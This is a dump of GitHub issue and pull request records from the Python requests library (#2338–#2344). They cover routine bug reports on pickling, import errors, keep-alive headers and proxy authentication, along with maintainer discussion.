[ "Note to @kennethreitz, we **can not** do a release until we fix this.\n", "So we can't just remove `redirect_cache` from the list of `__attrs__`, it breaks the tests. So ... I'm thinking we have to special case how we serialize a `RecentlyUsedContainer`. We can call `dict` on the cache, but to repopulate it, we need to look over the items and then set them individually on the container which seems suboptimal. For now, we can do that until we maybe get something merged upstream in urllib3. The difficult thing is that the container is threadsafe, so I imagine an `update` method wouldn't be fit it well.\n", "oops. :(\n", "@mattrobenolt Not your fault, our CI was busted so you had no way to know. =)\n", "Also, we told you to take this approach. Not your fault in the slightest.\n" ]
https://api.github.com/repos/psf/requests/issues/2344
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2344/labels{/name}
https://api.github.com/repos/psf/requests/issues/2344/comments
https://api.github.com/repos/psf/requests/issues/2344/events
https://github.com/psf/requests/pull/2344
48,938,522
MDExOlB1bGxSZXF1ZXN0MjQ0OTY0MzQ=
2,344
Partially addresses Issue #1572
{ "avatar_url": "https://avatars.githubusercontent.com/u/7707694?v=4", "events_url": "https://api.github.com/users/ContinuousFunction/events{/privacy}", "followers_url": "https://api.github.com/users/ContinuousFunction/followers", "following_url": "https://api.github.com/users/ContinuousFunction/following{/other_user}", "gists_url": "https://api.github.com/users/ContinuousFunction/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/ContinuousFunction", "id": 7707694, "login": "ContinuousFunction", "node_id": "MDQ6VXNlcjc3MDc2OTQ=", "organizations_url": "https://api.github.com/users/ContinuousFunction/orgs", "received_events_url": "https://api.github.com/users/ContinuousFunction/received_events", "repos_url": "https://api.github.com/users/ContinuousFunction/repos", "site_admin": false, "starred_url": "https://api.github.com/users/ContinuousFunction/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/ContinuousFunction/subscriptions", "type": "User", "url": "https://api.github.com/users/ContinuousFunction", "user_view_type": "public" }
[]
closed
true
null
[]
null
12
2014-11-16T00:59:29Z
2021-09-08T09:01:07Z
2014-12-17T04:49:50Z
CONTRIBUTOR
resolved
Addresses the LocationParseError but not the DecodeError from kennethreitz#1572. When running test_requests.py, I got an error in test_session_pickling which resulted in a TypeError. I'm not sure of the reason for the TypeError but I have commented out that test.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2344/reactions" }
https://api.github.com/repos/psf/requests/issues/2344/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2344.diff", "html_url": "https://github.com/psf/requests/pull/2344", "merged_at": "2014-12-17T04:49:50Z", "patch_url": "https://github.com/psf/requests/pull/2344.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2344" }
true
[ "Why have we commented out a test here?\n", "@Lukasa it's a test failure on master apparently. Besides that, I'm -1 on this. A `LocationParseError` happens long before a connection is even attempted. This should be an `InvalidURL` error\n", "Also the test failure was introduced sometime since 122c92e59002cad20c29be4e9ec9d4f6d50a1ef6\n", "Since it's complaining about Locks not being picklable, I suspect this has something to do with 387c8f8 since the `RecentlyUsedContainer` uses threading's locks. One solution is to not try to pickle the redirect cache. That said, this discussion belongs in its own issue.\n", "@sigmavirus24 If I've understood you correctly, I have changed the ConnectionError to an InvalidURL error.\n", "@ContinuousFunction could you amend your commit messages? Two commits in a row with the same message is incredibly unhelpful when looking at the log.\n", "@sigmavirus24 sorry about that. I've changed the message.\n", "@ContinuousFunction can you rebase this, uncomment the test that you commented, and ensure the tests pass. Then force-push to this same branch?\n", "@sigmavirus24 I believe I have made the appropriate changes.\n", "Thanks @ContinuousFunction I'll run these tests now and make sure they pass before merging.\n", "There was a test failure on Python 3 because `urllib3.exceptions.LocationParseError` doesn't have a `message` attribute. That's fixed in bd3cf95e34aa49c8d764c899672048df107e0d70.\n\nThanks @ContinuousFunction !\n", "@sigmavirus24 My pleasure!\n" ]
https://api.github.com/repos/psf/requests/issues/2343
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2343/labels{/name}
https://api.github.com/repos/psf/requests/issues/2343/comments
https://api.github.com/repos/psf/requests/issues/2343/events
https://github.com/psf/requests/pull/2343
48,936,444
MDExOlB1bGxSZXF1ZXN0MjQ0OTU1MDU=
2,343
Partially addresses Issue #1572
{ "avatar_url": "https://avatars.githubusercontent.com/u/7707694?v=4", "events_url": "https://api.github.com/users/ContinuousFunction/events{/privacy}", "followers_url": "https://api.github.com/users/ContinuousFunction/followers", "following_url": "https://api.github.com/users/ContinuousFunction/following{/other_user}", "gists_url": "https://api.github.com/users/ContinuousFunction/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/ContinuousFunction", "id": 7707694, "login": "ContinuousFunction", "node_id": "MDQ6VXNlcjc3MDc2OTQ=", "organizations_url": "https://api.github.com/users/ContinuousFunction/orgs", "received_events_url": "https://api.github.com/users/ContinuousFunction/received_events", "repos_url": "https://api.github.com/users/ContinuousFunction/repos", "site_admin": false, "starred_url": "https://api.github.com/users/ContinuousFunction/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/ContinuousFunction/subscriptions", "type": "User", "url": "https://api.github.com/users/ContinuousFunction", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-11-15T23:23:58Z
2021-09-08T09:01:14Z
2014-11-15T23:56:42Z
CONTRIBUTOR
resolved
Addresses the LocationParseError but not the DecodeError from kennethreitz#1572. When running test_requests.py, I got an error in test_session_pickling which resulted in a TypeError. I'm not sure of the reason for the TypeError but I have commented out that test.
{ "avatar_url": "https://avatars.githubusercontent.com/u/7707694?v=4", "events_url": "https://api.github.com/users/ContinuousFunction/events{/privacy}", "followers_url": "https://api.github.com/users/ContinuousFunction/followers", "following_url": "https://api.github.com/users/ContinuousFunction/following{/other_user}", "gists_url": "https://api.github.com/users/ContinuousFunction/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/ContinuousFunction", "id": 7707694, "login": "ContinuousFunction", "node_id": "MDQ6VXNlcjc3MDc2OTQ=", "organizations_url": "https://api.github.com/users/ContinuousFunction/orgs", "received_events_url": "https://api.github.com/users/ContinuousFunction/received_events", "repos_url": "https://api.github.com/users/ContinuousFunction/repos", "site_admin": false, "starred_url": "https://api.github.com/users/ContinuousFunction/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/ContinuousFunction/subscriptions", "type": "User", "url": "https://api.github.com/users/ContinuousFunction", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2343/reactions" }
https://api.github.com/repos/psf/requests/issues/2343/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2343.diff", "html_url": "https://github.com/psf/requests/pull/2343", "merged_at": null, "patch_url": "https://github.com/psf/requests/pull/2343.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2343" }
true
[ "My branch is 96 commits ahead and 142 commits behind. Will close until I figure out the problem.\n" ]
https://api.github.com/repos/psf/requests/issues/2342
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2342/labels{/name}
https://api.github.com/repos/psf/requests/issues/2342/comments
https://api.github.com/repos/psf/requests/issues/2342/events
https://github.com/psf/requests/issues/2342
48,837,799
MDU6SXNzdWU0ODgzNzc5OQ==
2,342
chardet ImportError: cannot import name universaldetector
{ "avatar_url": "https://avatars.githubusercontent.com/u/9618138?v=4", "events_url": "https://api.github.com/users/ivankoster/events{/privacy}", "followers_url": "https://api.github.com/users/ivankoster/followers", "following_url": "https://api.github.com/users/ivankoster/following{/other_user}", "gists_url": "https://api.github.com/users/ivankoster/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/ivankoster", "id": 9618138, "login": "ivankoster", "node_id": "MDQ6VXNlcjk2MTgxMzg=", "organizations_url": "https://api.github.com/users/ivankoster/orgs", "received_events_url": "https://api.github.com/users/ivankoster/received_events", "repos_url": "https://api.github.com/users/ivankoster/repos", "site_admin": false, "starred_url": "https://api.github.com/users/ivankoster/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/ivankoster/subscriptions", "type": "User", "url": "https://api.github.com/users/ivankoster", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2014-11-14T20:46:58Z
2021-09-08T23:06:59Z
2014-11-14T21:28:32Z
NONE
resolved
Hello, When I try to retrieve the text attribute from a request, i get the following error: Traceback (most recent call last): File ".\sublime_plugin.py", line 175, in on_load File ".\sublime_plugin.py", line 154, in run_timed_function File ".\sublime_plugin.py", line 174, in <lambda> File ".\SublimeYouCompleteMe.py", line 244, in on_load File ".\plugin\ycmd_request.py", line 136, in send File ".\plugin\ycmd_request.py", line 43, in post_data_to_handler File ".\plugin\ycmd_request.py", line 109, in json_from_response File ".\requests\models.py", line 756, in text encoding = self.apparent_encoding File ".\requests\models.py", line 637, in apparent_encoding return chardet.detect(self.content)['encoding'] File ".\requests\packages\chardet\detect.py", line 11, in detect ImportError: cannot import name universaldetector On python 2.7.8 I think this is an error in chardet's detect function in **init**.py, which does an import on function level instead of module level. The import is "from . import universaldetector" and since it is called from requests/models.py it searches in the requests folder for universaldetector, which obviously fails. I confirmed this by changing the line to "from packages.chardet import universaldetector" which hilariously solves the problem. But I wonder if this bug is down to my specific configuration, because it seems like a bug that would affect a lot of people?
{ "avatar_url": "https://avatars.githubusercontent.com/u/9618138?v=4", "events_url": "https://api.github.com/users/ivankoster/events{/privacy}", "followers_url": "https://api.github.com/users/ivankoster/followers", "following_url": "https://api.github.com/users/ivankoster/following{/other_user}", "gists_url": "https://api.github.com/users/ivankoster/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/ivankoster", "id": 9618138, "login": "ivankoster", "node_id": "MDQ6VXNlcjk2MTgxMzg=", "organizations_url": "https://api.github.com/users/ivankoster/orgs", "received_events_url": "https://api.github.com/users/ivankoster/received_events", "repos_url": "https://api.github.com/users/ivankoster/repos", "site_admin": false, "starred_url": "https://api.github.com/users/ivankoster/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/ivankoster/subscriptions", "type": "User", "url": "https://api.github.com/users/ivankoster", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2342/reactions" }
https://api.github.com/repos/psf/requests/issues/2342/timeline
null
completed
null
null
false
[ "This is simply because you're using requests inside a sublime package and sublime has it's own weird Python that it ships with (if I remember correctly).\n", "Ah thanks for the insight.\nI expected something like that, because it would affect too many people otherwise.\nI do know the encoding beforehand so I've used that to avoid importing the chardet module.\nThanks again!\n", "No worries @ivankoster \n" ]
https://api.github.com/repos/psf/requests/issues/2341
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2341/labels{/name}
https://api.github.com/repos/psf/requests/issues/2341/comments
https://api.github.com/repos/psf/requests/issues/2341/events
https://github.com/psf/requests/issues/2341
48,812,889
MDU6SXNzdWU0ODgxMjg4OQ==
2,341
"keep-alive" over a HTTP/1.0 request issue
{ "avatar_url": "https://avatars.githubusercontent.com/u/642052?v=4", "events_url": "https://api.github.com/users/laurento/events{/privacy}", "followers_url": "https://api.github.com/users/laurento/followers", "following_url": "https://api.github.com/users/laurento/following{/other_user}", "gists_url": "https://api.github.com/users/laurento/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/laurento", "id": 642052, "login": "laurento", "node_id": "MDQ6VXNlcjY0MjA1Mg==", "organizations_url": "https://api.github.com/users/laurento/orgs", "received_events_url": "https://api.github.com/users/laurento/received_events", "repos_url": "https://api.github.com/users/laurento/repos", "site_admin": false, "starred_url": "https://api.github.com/users/laurento/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/laurento/subscriptions", "type": "User", "url": "https://api.github.com/users/laurento", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-11-14T17:00:38Z
2021-09-08T23:06:58Z
2014-11-15T14:27:36Z
NONE
resolved
Debugging a nasty "300: Bad request" error I noticed an invalid behaviour when requests-2.4 is used in combination with HTTP/1.0. Tring to reproduce the issue this is what I found... ``` python import httplib import requests # Workaround for the IncompleteRead issue. # See http://bugs.python.org/issue14044 httplib.HTTPConnection._http_vsn = 10 httplib.HTTPConnection._http_vsn_str = 'HTTP/1.0' r = requests.get('https://www.google.com') r.request.headers ``` On requests-2.4.3 (from PyPi) the request headers are ``` python {'Connection': 'keep-alive', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': 'python-requests/2.4.3 CPython/2.7.8 Linux/3.16.0-24-generic'} ``` On requests-2.3.0 (Ubuntu 14.10 official repos) the request headers are (notice no keep-alive here) ``` python {'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': 'python-requests/2.3.0 CPython/2.7.8 Linux/3.16.0-24-generic'} ``` Reading the documentation I guess HTTP/1.0 is not supported by the requests library but I'd like to suggest at least a nice WARN log message to inform the result can be weird. Some setups don't seem to like the _invalid_ combination "keep-alive" in the headers and HTTP/1.0 and even if in most cases everything is working fine at least once I received a "300: Bad request" error.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2341/reactions" }
https://api.github.com/repos/psf/requests/issues/2341/timeline
null
completed
null
null
false
[ "Sorry, this is a bit unclear to me. Are you explicitly setting the version string on all `HTTPConnection`s? You can override the `Connection: keep-alive` header, like so\n\n``` pycon\nPython 2.7.8 (default, Oct 19 2014, 16:03:53)\n[GCC 4.2.1 Compatible Apple LLVM 6.0 (clang-600.0.51)] on darwin\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import requests\n>>> requests.__version__\n'2.4.1'\n>>> r = requests.get('https://httpbin.org/get', headers={'Connection': None})\n>>> r.request.headers\n{'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': 'python-requests/2.4.1 CPython/2.7.8 Darwin/14.0.0'}\n```\n\nIf you use a session you can do:\n\n``` pycon\n>>> s = requests.Session()\n>>> s\n<requests.sessions.Session object at 0x10e569dd0>\n>>> s.headers\n{'Connection': 'keep-alive', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': 'python-requests/2.4.1 CPython/2.7.8 Darwin/14.0.0'}\n>>> del s.headers['Connection']\n>>> r2 = s.get('https://httpbin.org/get')\n>>> r2.request.headers\n{'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': 'python-requests/2.4.1 CPython/2.7.8 Darwin/14.0.0'}\n```\n\nTechnically we were supposed to be sending this header since 1.0 (and we were at some point) so this isn't something we should need to warn most users about. We also don't introspect httplib at any point to determine if you've overridden any of the values because 99% of our users don't do that. And if they do, they know that if they get unexpected results it isn't our fault for expecting something different.\n" ]
https://api.github.com/repos/psf/requests/issues/2340
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2340/labels{/name}
https://api.github.com/repos/psf/requests/issues/2340/comments
https://api.github.com/repos/psf/requests/issues/2340/events
https://github.com/psf/requests/issues/2340
48,777,189
MDU6SXNzdWU0ODc3NzE4OQ==
2,340
ImportError: cannot import name 'certs'
{ "avatar_url": "https://avatars.githubusercontent.com/u/7079544?v=4", "events_url": "https://api.github.com/users/davyria/events{/privacy}", "followers_url": "https://api.github.com/users/davyria/followers", "following_url": "https://api.github.com/users/davyria/following{/other_user}", "gists_url": "https://api.github.com/users/davyria/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/davyria", "id": 7079544, "login": "davyria", "node_id": "MDQ6VXNlcjcwNzk1NDQ=", "organizations_url": "https://api.github.com/users/davyria/orgs", "received_events_url": "https://api.github.com/users/davyria/received_events", "repos_url": "https://api.github.com/users/davyria/repos", "site_admin": false, "starred_url": "https://api.github.com/users/davyria/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/davyria/subscriptions", "type": "User", "url": "https://api.github.com/users/davyria", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2014-11-14T11:41:59Z
2021-09-08T23:06:57Z
2014-11-15T14:20:41Z
NONE
resolved
I'm having this error for the last 2 days. It seems a problem with python requests library, but I've re-installed it several times with no luck. ``` Traceback (most recent call last): File "project-src/bla-blah/manage.py", line 10, in <module> execute_from_command_line(sys.argv) File "project-src\env\lib\site-packages\django\core\management\__init__.py", line 385, in execute_from_command_line utility.execute() File "project-src\env\lib\site-packages\django\core\management\__init__.py", line 354, in execute django.setup() File "project-src\env\lib\site-packages\django\__init__.py", line 21, in setup apps.populate(settings.INSTALLED_APPS) File "project-src\env\lib\site-packages\django\apps\registry.py", line 85, in populate app_config = AppConfig.create(entry) File "project-src\env\lib\site-packages\django\apps\config.py", line 112, in create mod = import_module(mod_path) File "C:\Python34\lib\importlib\__init__.py", line 109, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "<frozen importlib._bootstrap>", line 2254, in _gcd_import File "<frozen importlib._bootstrap>", line 2237, in _find_and_load File "<frozen importlib._bootstrap>", line 2226, in _find_and_load_unlocked File "<frozen importlib._bootstrap>", line 1200, in _load_unlocked File "<frozen importlib._bootstrap>", line 1129, in _exec File "<frozen importlib._bootstrap>", line 1471, in exec_module File "<frozen importlib._bootstrap>", line 321, in _call_with_frames_removed File "project-src\env\lib\site-packages\social\apps\django_app\__init__.py", line 14, in <module> from social.apps.django_app.utils import load_strategy File "project-src\env\lib\site-packages\social\apps\django_app\utils.py", line 12, in <module> from social.backends.utils import get_backend File "project-src\env\lib\site-packages\social\backends\utils.py", line 2, in <module> from social.backends.base import BaseAuth File "project-src\env\lib\site-packages\social\backends\base.py", line 1, in <module> from requests import request, ConnectionError File "project-src\env\lib\site-packages\requests\__init__.py", line 58, in <module> from . import utils File "project-src\env\lib\site-packages\requests\utils.py", line 24, in <module> from . import certs ImportError: cannot import name 'certs' ``` Maybe it's a problem with Windows 7 update from 2 days ago, because is the only thing that has changed in the last few days. By the way, I'm using python 3.4 with virtualenv, PyCharm 3.4.1 IDE and Win7. Inside **certs.py** there is the code that has the problem (last line): ``` try: from certifi import where except ImportError: def where(): """Return the preferred certificate bundle.""" # vendored bundle inside Requests return os.path.join(os.path.dirname(__file__), 'cacert.pem') ``` Any ideas?
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2340/reactions" }
https://api.github.com/repos/psf/requests/issues/2340/timeline
null
completed
null
null
false
[ "As discussed on your [StackOverflow question](https://stackoverflow.com/questions/26928672/importerror-cannot-import-name-certs?noredirect=1#comment42433284_26928672), we concluded this is not a bug. Thanks @davyria \n", "It happens to me exactly the same after installing the latest Windows update. It is the only library of all installed which fails. Could it be using a native operating system resource? In OSX, GNU/Linux and Windows (without upgrading) works perfectly, so I think it's a issue of the lib in the new environment.\n", "@blazaid it sounds more like an issue with the environment to me. Without a Windows VM to test with I can't provide much help. Your best bet is to describe the series of events that led to your broken installation and posting to StackOverflow with more detail than @davyria \n" ]
https://api.github.com/repos/psf/requests/issues/2339
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2339/labels{/name}
https://api.github.com/repos/psf/requests/issues/2339/comments
https://api.github.com/repos/psf/requests/issues/2339/events
https://github.com/psf/requests/issues/2339
48,704,429
MDU6SXNzdWU0ODcwNDQyOQ==
2,339
Create a response object from archived string or file HTTP responses.
{ "avatar_url": "https://avatars.githubusercontent.com/u/1725327?v=4", "events_url": "https://api.github.com/users/recrm/events{/privacy}", "followers_url": "https://api.github.com/users/recrm/followers", "following_url": "https://api.github.com/users/recrm/following{/other_user}", "gists_url": "https://api.github.com/users/recrm/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/recrm", "id": 1725327, "login": "recrm", "node_id": "MDQ6VXNlcjE3MjUzMjc=", "organizations_url": "https://api.github.com/users/recrm/orgs", "received_events_url": "https://api.github.com/users/recrm/received_events", "repos_url": "https://api.github.com/users/recrm/repos", "site_admin": false, "starred_url": "https://api.github.com/users/recrm/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/recrm/subscriptions", "type": "User", "url": "https://api.github.com/users/recrm", "user_view_type": "public" }
[ { "color": "02e10c", "default": false, "description": null, "id": 76800, "name": "Feature Request", "node_id": "MDU6TGFiZWw3NjgwMA==", "url": "https://api.github.com/repos/psf/requests/labels/Feature%20Request" } ]
closed
true
null
[]
null
3
2014-11-13T22:56:56Z
2021-09-08T23:06:59Z
2014-11-14T14:20:49Z
NONE
resolved
So I'm working with warc files. Warc files are a storage medium for saving and archiving websites, so they contain plenty (possibly thousands) of text HTTP request / response pairs. I need a way to parse these responses into usable objects. Extracting the text of the HTTP response from the warc file is easy enough, but I can't find a decent python library that will convert that response text into a response object. About the best I can find is this: http://stackoverflow.com/questions/24728088/python-parse-http-response-string which requires me to set up fake server connections using a really ugly library. As a work around it kinda works, but it would be nice to work with something a bit more human. In my field the internet archive is growing in importance and I can see this issue coming up for more people than just me. It would be a nice feature to have.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2339/reactions" }
https://api.github.com/repos/psf/requests/issues/2339/timeline
null
completed
null
null
false
[ "This feature really belongs in another library altogether. The problem is that the HTTP parsing logic in requests is in `httplib`, which is well down our stack and outside our control. This means we can't pull it out into common code.\n\n_However_, @dstufft has been working on a formal HTTP parsing library which might be usable as a base for this use-case. What do you think, @dstufft?\n", "Uh, yea you can parse that with my http11 lib, but it has no docs currently and would require some assembly right now I think. In particular I don't think it actually parses bodies currently.\n", "I agree. This belongs in another library. If that library chooses to interact with requests that'd be great and they could probably take a similar approach to [betamax](/sigmavirus24/betamax). I'm happy to advise, but this isn't a bug and it's at this point a rejected feature.\n\nThanks @recrm for starting this discussion.\n" ]
https://api.github.com/repos/psf/requests/issues/2338
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2338/labels{/name}
https://api.github.com/repos/psf/requests/issues/2338/comments
https://api.github.com/repos/psf/requests/issues/2338/events
https://github.com/psf/requests/issues/2338
48,663,828
MDU6SXNzdWU0ODY2MzgyOA==
2,338
Proxy not working
{ "avatar_url": "https://avatars.githubusercontent.com/u/9723897?v=4", "events_url": "https://api.github.com/users/dmorri/events{/privacy}", "followers_url": "https://api.github.com/users/dmorri/followers", "following_url": "https://api.github.com/users/dmorri/following{/other_user}", "gists_url": "https://api.github.com/users/dmorri/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/dmorri", "id": 9723897, "login": "dmorri", "node_id": "MDQ6VXNlcjk3MjM4OTc=", "organizations_url": "https://api.github.com/users/dmorri/orgs", "received_events_url": "https://api.github.com/users/dmorri/received_events", "repos_url": "https://api.github.com/users/dmorri/repos", "site_admin": false, "starred_url": "https://api.github.com/users/dmorri/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/dmorri/subscriptions", "type": "User", "url": "https://api.github.com/users/dmorri", "user_view_type": "public" }
[]
closed
true
null
[]
null
45
2014-11-13T17:13:41Z
2021-09-05T00:06:57Z
2014-11-17T08:48:58Z
NONE
resolved
This code will work on my personal laptop, but then when I move to a windows server where we have to use a proxy to access the outside world, I get a 407 error. I added the proxies to this (just like I have setup in my Internet explorer settings that work). Any ideas? import requests proxies = { "http": "10.51.1.140:8080", "https": "10.51.1.140:8080", } r = requests.get('https://epfws.usps.gov/ws/resources/epf/version', proxies=proxies) print(r.text) Here is what I get: G:\Python34>python uspsver.py Traceback (most recent call last): File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\packages \urllib3\connectionpool.py", line 511, in urlopen conn = self._get_conn(timeout=pool_timeout) File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\packages \urllib3\connectionpool.py", line 231, in _get_conn return conn or self._new_conn() File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\packages \urllib3\connectionpool.py", line 712, in _new_conn return self._prepare_conn(conn) File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\packages \urllib3\connectionpool.py", line 685, in _prepare_conn conn.connect() File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\packages \urllib3\connection.py", line 208, in connect self._tunnel() File "G:\Python34\lib\http\client.py", line 822, in _tunnel message.strip())) OSError: Tunnel connection failed: 407 Proxy Authentication Required During handling of the above exception, another exception occurred: Traceback (most recent call last): File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\adapters .py", line 364, in send timeout=timeout File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\packages \urllib3\connectionpool.py", line 559, in urlopen _pool=self, _stacktrace=stacktrace) File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\packages \urllib3\util\retry.py", line 265, in increment raise MaxRetryError(_pool, url, error) requests.packages.urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='ep fws.usps.gov', port=443): Max retries exceeded with url: /ws/resources/epf/versi on (Caused by ProxyError('Cannot connect to proxy.', OSError('Tunnel connection failed: 407 Proxy Authentication Required',))) During handling of the above exception, another exception occurred: Traceback (most recent call last): File "uspsver.py", line 5, in <module> r = requests.get('https://epfws.usps.gov/ws/resources/epf/version', proxies= proxies) File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\api.py", line 65, in get return request('get', url, *_kwargs) File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\api.py", line 49, in request response = session.request(method=method, url=url, *_kwargs) File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\sessions .py", line 459, in request resp = self.send(prep, *_send_kwargs) File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\sessions .py", line 571, in send r = adapter.send(request, *_kwargs) File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\adapters .py", line 415, in send raise ConnectionError(e, request=request) 